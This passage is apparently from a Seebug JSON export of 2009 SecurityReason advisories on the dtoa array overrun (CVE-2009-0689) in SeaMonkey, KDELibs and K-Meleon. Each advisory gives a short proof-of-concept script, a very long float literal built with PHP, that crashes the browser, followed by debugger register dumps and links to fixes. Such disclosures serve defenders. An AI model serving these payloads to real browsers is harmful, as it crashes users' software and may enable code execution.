Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\r\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\r\n=jTmp\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18280", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:23:19", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "SeaMonkey 1.1.8 - Remote Array Overrun", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67075", "id": "SSV:67075", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey\r\nall-in-one internet application suite (see below). 
Such a software suite\r\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\r\nproject continues to develop and deliver high-quality updates to this\r\nconcept. Containing an Internet browser, email & newsgroup client with\r\nan included web feed reader, HTML editor, IRC chat and web development\r\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. SeaMonkey has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? 
()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number "CVE-2009-1563". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on "CVE-2009-0689". After some time Mozilla Foundation\r\nSecurity Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. 
Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67075", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:23:01", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "KDE KDELibs 4.3.3 - Remote Array Overrun", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67074", "id": "SSV:67074", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. 
Problem exist\r\nin dtoa.cpp file\r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\r\nit is possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 
0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number "CVE-2009-1563". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on "CVE-2009-0689". After some time Mozilla Foundation\r\nSecurity Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. 
Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\r\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\r\n=jTmp\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67074", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:31:05", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "K-Meleon 1.5.3 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18282", "id": "SSV:18282", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser\r\nbased on the Gecko layout engine developed by Mozilla which is also used\r\nby Firefox. K-Meleon is free, open source software released under the\r\nGNU General Public License and is designed specifically for Microsoft\r\nWindows (Win32) operating systems.\r\n\r\n\r\n- --- 1. 
K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\r\nviolation reading location 0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx]\r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number "CVE-2009-1563". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on "CVE-2009-0689". 
After some time Mozilla Foundation\r\nSecurity Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD 
fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb
